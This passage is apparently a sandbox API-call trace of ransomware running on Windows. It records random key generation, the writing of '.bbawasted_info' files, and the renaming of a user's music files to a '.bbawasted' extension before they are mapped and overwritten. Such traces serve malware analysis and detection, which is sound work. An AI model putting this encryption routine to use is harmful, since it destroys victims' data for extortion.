(in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.442] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Zrl4qKnN7b P.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zrl4qknn7b p.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.443] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.445] SetEndOfFile (hFile=0x120) returned 1 [0074.445] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.445] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.445] lstrcpyW (in: lpString1=0x5bf108, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Zrl4qKnN7b P.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zrl4qknn7b p.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Zrl4qKnN7b P.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zrl4qknn7b p.wav.bbawasted")) returned 1 [0074.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Zrl4qKnN7b P.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\zrl4qknn7b p.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.483] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0074.484] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.485] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.485] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.485] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.486] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.486] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.495] SetEndOfFile (hFile=0x120) returned 1 [0074.498] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.498] CloseHandle (hObject=0x120) returned 1 [0074.499] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.500] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.501] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.501] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sBmvm.m4a") returned 49 [0074.501] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26c) returned 0x5d0700 [0074.501] lstrcpyW (in: lpString1=0x5d0762, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.501] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.501] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.502] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.502] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sBmvm.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sbmvm.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.556] WriteFile (in: hFile=0x11c, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.557] SetEndOfFile (hFile=0x11c) returned 1 [0074.557] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.557] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.557] lstrcpyW (in: lpString1=0x5d0762, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sBmvm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sbmvm.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sBmvm.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sbmvm.m4a.bbawasted")) returned 1 [0074.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sBmvm.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sbmvm.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.558] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0074.561] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.562] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf0b8 | out: pbBuffer=0x5bf0b8) returned 1 [0074.562] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.562] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.563] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.563] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.572] SetEndOfFile (hFile=0x11c) returned 1 [0074.574] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.574] CloseHandle (hObject=0x11c) returned 1 [0074.575] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0074.576] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.576] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.576] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TkSs7HGjxIj6pp_.m4a") returned 59 [0074.576] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x280) returned 0x5d0700 [0074.577] lstrcpyW (in: lpString1=0x5d0776, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.577] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.577] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.577] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.577] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TkSs7HGjxIj6pp_.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tkss7hgjxij6pp_.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.578] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.579] SetEndOfFile (hFile=0x11c) returned 1 [0074.579] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.579] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.579] lstrcpyW (in: lpString1=0x5d0776, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TkSs7HGjxIj6pp_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tkss7hgjxij6pp_.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TkSs7HGjxIj6pp_.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tkss7hgjxij6pp_.m4a.bbawasted")) returned 1 [0074.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TkSs7HGjxIj6pp_.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tkss7hgjxij6pp_.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.587] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.587] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.588] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.588] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.588] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.589] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.589] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.598] SetEndOfFile (hFile=0x11c) returned 1 [0074.600] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.600] CloseHandle (hObject=0x11c) returned 1 [0074.602] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0074.603] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.603] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.603] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.603] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VAaF6nQo.mp3") returned 52 [0074.603] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x272) returned 0x5d0700 [0074.603] lstrcpyW (in: lpString1=0x5d0768, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.604] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.604] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.604] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.604] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VAaF6nQo.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vaaf6nqo.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.605] WriteFile (in: hFile=0x11c, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.606] SetEndOfFile (hFile=0x11c) returned 1 [0074.606] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.606] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.606] lstrcpyW (in: lpString1=0x5d0768, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VAaF6nQo.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vaaf6nqo.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VAaF6nQo.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vaaf6nqo.mp3.bbawasted")) returned 1 [0074.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VAaF6nQo.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vaaf6nqo.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.607] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0074.608] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.609] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.609] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.609] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.610] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.610] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.618] SetEndOfFile (hFile=0x11c) returned 1 [0074.621] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.621] CloseHandle (hObject=0x11c) returned 1 [0074.622] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0074.622] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.623] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.623] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.623] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wuynnf3.wav") returned 51 [0074.623] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x270) returned 0x5d0700 [0074.624] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.624] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.624] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.625] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.625] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wuynnf3.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wuynnf3.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.625] WriteFile (in: hFile=0x11c, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.627] SetEndOfFile (hFile=0x11c) returned 1 [0074.627] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.627] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.627] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.627] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wuynnf3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wuynnf3.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wuynnf3.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wuynnf3.wav.bbawasted")) returned 1 [0074.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Wuynnf3.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wuynnf3.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.628] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.629] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.629] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf0b8 | out: pbBuffer=0x5bf0b8) returned 1 [0074.629] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.629] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.630] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.630] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.698] SetEndOfFile (hFile=0x11c) returned 1 [0074.700] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.700] CloseHandle (hObject=0x11c) returned 1 [0074.701] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0074.701] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.704] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.704] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.704] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_chBMS5X1.mp3") returned 53 [0074.704] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x274) returned 0x5d0700 [0074.704] lstrcpyW (in: lpString1=0x5d076a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.704] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.704] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.705] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.705] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_chBMS5X1.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_chbms5x1.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.706] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.709] SetEndOfFile (hFile=0x11c) returned 1 [0074.709] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.709] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.709] lstrcpyW (in: lpString1=0x5d076a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_chBMS5X1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_chbms5x1.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_chBMS5X1.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_chbms5x1.mp3.bbawasted")) returned 1 [0074.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_chBMS5X1.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_chbms5x1.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.710] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0074.712] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.713] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be950 | out: pbBuffer=0x5be950) returned 1 [0074.713] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.713] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.714] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.714] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.723] SetEndOfFile (hFile=0x11c) returned 1 [0074.725] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.725] CloseHandle (hObject=0x11c) returned 1 [0074.774] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0074.774] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.775] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.775] CryptReleaseContext 